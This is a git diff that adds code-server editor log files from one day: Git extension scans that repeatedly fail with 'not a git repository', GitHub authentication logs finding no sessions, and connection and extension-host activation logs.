@@ +2026-01-29 19:15:37.161 [info] [main] Log level: Info +2026-01-29 19:15:37.161 [info] [main] Validating found git in: "git" +2026-01-29 19:15:37.161 [info] [main] Using git "2.39.5" from "git" +2026-01-29 19:15:37.161 [info] [Model][doInitialScan] Initial repository scan started +2026-01-29 19:15:37.161 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 19:15:37.161 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 19:15:37.161 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 19:15:37.161 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 19:15:37.161 [info] > git rev-parse --show-toplevel [3ms] +2026-01-29 19:15:37.161 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 19:15:37.161 [info] > git rev-parse --show-toplevel [8ms] +2026-01-29 19:15:37.161 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 19:15:37.161 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 19:15:37.161 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 19:15:37.161 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 19:15:37.161 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 19:15:37.162 [info] > git rev-parse --show-toplevel [3ms] +2026-01-29 19:15:37.162 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 19:15:37.168 [info] > git rev-parse --show-toplevel [3ms] +2026-01-29 19:15:37.168 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 19:15:37.173 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 19:15:37.173 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 19:15:37.177 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 19:15:37.177 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 19:15:37.181 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 19:15:37.181 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 19:15:37.184 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 19:15:37.184 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 19:15:37.188 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 19:15:37.188 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 19:15:37.194 [info] > git rev-parse --show-toplevel [4ms] +2026-01-29 19:15:37.194 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 19:15:37.197 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-29 19:15:37.201 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 19:15:37.201 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 19:15:38.467 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 19:15:38.467 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 19:15:40.893 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 19:15:40.893 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 19:15:41.252 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 19:15:41.252 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 19:25:39.803 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 19:25:39.803 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 20:22:03.217 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 20:22:03.217 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 20:27:33.149 [info] > git rev-parse --show-toplevel [3ms] +2026-01-29 20:27:33.149 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 20:42:41.509 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 20:42:41.509 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 20:46:48.557 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 20:46:48.557 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 20:50:15.608 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 20:50:15.608 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 20:53:38.104 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 20:53:38.104 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 20:57:29.269 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 20:57:29.269 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:02:54.538 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:02:54.538 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:02:55.813 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:02:55.813 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:02:56.992 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:02:56.992 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:03:16.641 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:03:16.641 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:03:33.019 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:03:33.019 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:04:14.277 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:04:14.277 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:04:32.049 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:04:32.049 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:04:51.118 [info] > git rev-parse --show-toplevel [3ms] +2026-01-29 21:04:51.118 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:08:29.529 [info] > git rev-parse --show-toplevel [4ms] +2026-01-29 21:08:29.529 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:08:46.142 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:08:46.142 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:09:18.764 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:09:18.764 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:09:43.185 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:09:43.185 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:15:36.637 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:15:36.638 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:16:07.760 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:16:07.760 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:17:11.548 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:17:11.549 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:22:51.437 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:22:51.437 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:22:51.961 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:22:51.961 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:22:54.732 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:22:54.732 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:23:13.288 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:23:13.288 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:23:30.935 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:23:30.935 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:23:31.541 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:23:31.541 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:23:33.178 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:23:33.178 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:23:53.475 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:23:53.475 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:23:53.961 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:23:53.961 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:24:00.607 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:24:00.607 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:24:01.042 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:24:01.042 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:24:03.864 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:24:03.864 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:24:19.710 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:24:19.710 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:24:20.352 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:24:20.352 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:24:33.245 [info] > git rev-parse --show-toplevel [3ms] +2026-01-29 21:24:33.245 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:24:33.723 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:24:33.723 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:24:34.417 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:24:34.417 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..e84ddeb --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-29 19:15:36.972 [info] Reading sessions from keychain... +2026-01-29 19:15:36.972 [info] Getting sessions for all scopes... +2026-01-29 19:15:36.972 [info] Got 0 sessions for ... +2026-01-29 19:15:36.972 [info] Getting sessions for all scopes... +2026-01-29 19:15:36.972 [info] Got 0 sessions for ... +2026-01-29 19:15:36.972 [info] Getting sessions for all scopes... +2026-01-29 19:15:36.972 [info] Got 0 sessions for ... +2026-01-29 19:15:36.972 [info] Getting sessions for all scopes... +2026-01-29 19:15:36.972 [info] Got 0 sessions for ... +2026-01-29 19:15:36.972 [info] Getting sessions for all scopes... +2026-01-29 19:15:36.972 [info] Got 0 sessions for ... +2026-01-29 19:15:36.972 [info] Getting sessions for all scopes... +2026-01-29 19:15:36.972 [info] Got 0 sessions for ... +2026-01-29 19:15:36.972 [info] Getting sessions for all scopes... +2026-01-29 19:15:36.972 [info] Got 0 sessions for ... +2026-01-29 19:15:36.972 [info] Getting sessions for all scopes... +2026-01-29 19:15:36.972 [info] Got 0 sessions for ... +2026-01-29 19:15:36.972 [info] Getting sessions for all scopes... +2026-01-29 19:15:36.972 [info] Got 0 sessions for ... +2026-01-29 19:15:36.992 [info] Getting sessions for all scopes... +2026-01-29 19:15:36.992 [info] Got 0 sessions for ... +2026-01-29 19:15:37.018 [info] Getting sessions for all scopes... +2026-01-29 19:15:37.018 [info] Got 0 sessions for ... +2026-01-29 19:15:37.018 [info] Getting sessions for all scopes... +2026-01-29 19:15:37.018 [info] Got 0 sessions for ... +2026-01-29 19:15:37.018 [info] Getting sessions for all scopes... +2026-01-29 19:15:37.018 [info] Got 0 sessions for ... +2026-01-29 19:15:37.018 [info] Getting sessions for all scopes... +2026-01-29 19:15:37.018 [info] Got 0 sessions for ... +2026-01-29 19:15:37.018 [info] Getting sessions for all scopes... +2026-01-29 19:15:37.018 [info] Got 0 sessions for ... +2026-01-29 19:15:38.462 [info] Getting sessions for all scopes... +2026-01-29 19:15:38.462 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/vscode.github/GitHub.log new file mode 100755 index 0000000..cab0b0b --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-29 19:15:37.167 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260129T001948/ptyhost.log b/.vscode_config/.local/share/code-server/logs/20260129T001948/ptyhost.log new file mode 100755 index 0000000..cef5799 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T001948/ptyhost.log @@ -0,0 +1,4 @@ +2026-01-29 19:15:36.837 [info] Expanding terminal instance, old id 70d739db-1 -> new id undefined +2026-01-29 19:15:41.071 [warning] Persistent process "1": Process had no disconnect runners but was an orphan +2026-01-29 19:15:41.072 [info] Persistent process reconnection "1" +2026-01-29 19:15:41.110 [info] Persistent process "1": Replaying 47 chars and 1 size events diff --git a/.vscode_config/.local/share/code-server/logs/20260129T001948/remoteTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260129T001948/remoteTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T001948/remoteagent.log b/.vscode_config/.local/share/code-server/logs/20260129T001948/remoteagent.log new file mode 100755 index 0000000..3b8ed7a --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T001948/remoteagent.log @@ -0,0 +1,34 @@ +2026-01-29 00:19:48.569 [info] + + + + +2026-01-29 00:19:48.585 [info] Extension host agent started. +2026-01-29 00:19:48.629 [error] [192.168.100.179][739ab47b][ManagementConnection] Unknown reconnection token (never seen). +2026-01-29 00:21:13.617 [info] [192.168.100.179][dd418480][ManagementConnection] New connection established. +2026-01-29 00:21:14.403 [info] [192.168.100.179][fba0e324][ExtensionHostConnection] New connection established. +2026-01-29 00:21:14.454 [info] [192.168.100.179][fba0e324][ExtensionHostConnection] <481> Launched Extension Host Process. +2026-01-29 00:21:14.701 [info] [192.168.100.179][fba0e324][ExtensionHostConnection] <481> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-29 01:16:26.930 [info] [192.168.100.179][dd418480][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-29 01:16:27.061 [info] [192.168.100.179][fba0e324][ExtensionHostConnection] <481> Extension Host Process exited with code: 0, signal: null. +2026-01-29 07:45:18.303 [info] [172.18.0.2][be6bb2b3][ManagementConnection] New connection established. +2026-01-29 07:45:21.706 [info] [172.18.0.2][75b390ac][ExtensionHostConnection] New connection established. +2026-01-29 07:45:21.715 [info] [172.18.0.2][75b390ac][ExtensionHostConnection] <10823> Launched Extension Host Process. +2026-01-29 07:45:21.965 [info] [172.18.0.2][75b390ac][ExtensionHostConnection] <10823> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + +2026-01-29 09:15:46.737 [info] [172.18.0.2][75b390ac][ExtensionHostConnection] The client has reconnected. +2026-01-29 09:15:46.770 [info] [172.18.0.2][be6bb2b3][ManagementConnection] The client has reconnected. +2026-01-29 09:15:58.142 [info] [172.18.0.2][be6bb2b3][ManagementConnection] The client has reconnected. +2026-01-29 09:15:58.313 [info] [172.18.0.2][75b390ac][ExtensionHostConnection] The client has reconnected. +2026-01-29 09:17:41.604 [info] [172.18.0.2][be6bb2b3][ManagementConnection] The client has disconnected, will wait for reconnection 3h before disposing... +2026-01-29 09:19:56.543 [info] [172.18.0.2][be6bb2b3][ManagementConnection] Another client has connected, will shorten the wait for reconnection 5m before disposing... +2026-01-29 09:19:56.543 [info] [172.18.0.2][be6bb2b3][ManagementConnection] The client has reconnected. +2026-01-29 09:19:56.718 [info] [172.18.0.2][75b390ac][ExtensionHostConnection] The client has reconnected. +2026-01-29 16:27:52.939 [info] [172.18.0.2][be6bb2b3][ManagementConnection] The client has disconnected gracefully, so the connection will be disposed. +2026-01-29 16:27:53.025 [info] [172.18.0.2][75b390ac][ExtensionHostConnection] <10823> Extension Host Process exited with code: 0, signal: null. +2026-01-29 19:15:34.703 [info] [192.168.100.179][ce4fbe60][ManagementConnection] New connection established. +2026-01-29 19:15:35.703 [info] [192.168.100.179][713309c9][ExtensionHostConnection] New connection established. +2026-01-29 19:15:35.710 [info] [192.168.100.179][713309c9][ExtensionHostConnection] <104591> Launched Extension Host Process. +2026-01-29 19:15:35.958 [info] [192.168.100.179][713309c9][ExtensionHostConnection] <104591> [reconnection-grace-time] Extension host: read VSCODE_RECONNECTION_GRACE_TIME=10800000ms (10800s) + diff --git a/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/remoteexthost.log new file mode 100755 index 0000000..4bea21a --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/remoteexthost.log @@ -0,0 +1,15 @@ +2026-01-29 21:35:39.022 [info] Extension host with pid 530 started +2026-01-29 21:35:39.022 [error] Error: EEXIST: file already exists, open '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock' +2026-01-29 21:35:39.023 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Could not acquire lock, checking if the file is stale. +2026-01-29 21:35:39.024 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': The pid 104591 appears to be gone. +2026-01-29 21:35:39.024 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Deleting a stale lock. +2026-01-29 21:35:39.031 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Lock acquired. +2026-01-29 21:35:39.125 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-29 21:35:39.126 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-29 21:35:39.257 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-29 21:35:39.297 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-29 21:35:39.297 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-29 21:35:39.520 [info] Eager extensions activated +2026-01-29 21:35:39.520 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-29 21:35:39.521 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-29 21:35:39.786 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' diff --git a/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/vscode.git/Git.log new file mode 100755 index 0000000..169ef5c --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/vscode.git/Git.log @@ -0,0 +1,83 @@ +2026-01-29 21:35:39.560 [info] [main] Log level: Info +2026-01-29 21:35:39.560 [info] [main] Validating found git in: "git" +2026-01-29 21:35:39.560 [info] [main] Using git "2.39.5" from "git" +2026-01-29 21:35:39.560 [info] [Model][doInitialScan] Initial repository scan started +2026-01-29 21:35:39.560 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:35:39.560 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:35:39.560 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:35:39.560 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:35:39.561 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:35:39.561 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:35:39.589 [info] > git rev-parse --show-toplevel [25ms] +2026-01-29 21:35:39.589 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:35:39.597 [info] > git rev-parse --show-toplevel [5ms] +2026-01-29 21:35:39.597 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:35:39.603 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:35:39.603 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:35:39.607 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:35:39.607 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:35:39.611 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:35:39.611 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:35:39.616 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:35:39.616 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:35:39.621 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:35:39.621 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:35:39.625 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:35:39.625 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:35:39.630 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:35:39.630 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:35:39.634 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:35:39.634 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:35:39.638 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:35:39.638 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:35:39.641 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-29 21:35:39.900 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:35:39.900 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:35:41.075 [info] > git rev-parse --show-toplevel [6ms] +2026-01-29 21:35:41.075 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:36:01.179 [info] > git rev-parse --show-toplevel [4ms] +2026-01-29 21:36:01.179 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:36:53.081 [info] > git rev-parse --show-toplevel [1ms] +2026-01-29 21:36:53.081 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:38:30.793 [info] > git rev-parse --show-toplevel [2ms] +2026-01-29 21:38:30.793 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:38:54.461 [info] > git rev-parse --show-toplevel [4ms] +2026-01-29 21:38:54.461 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-29 21:39:44.624 [info] 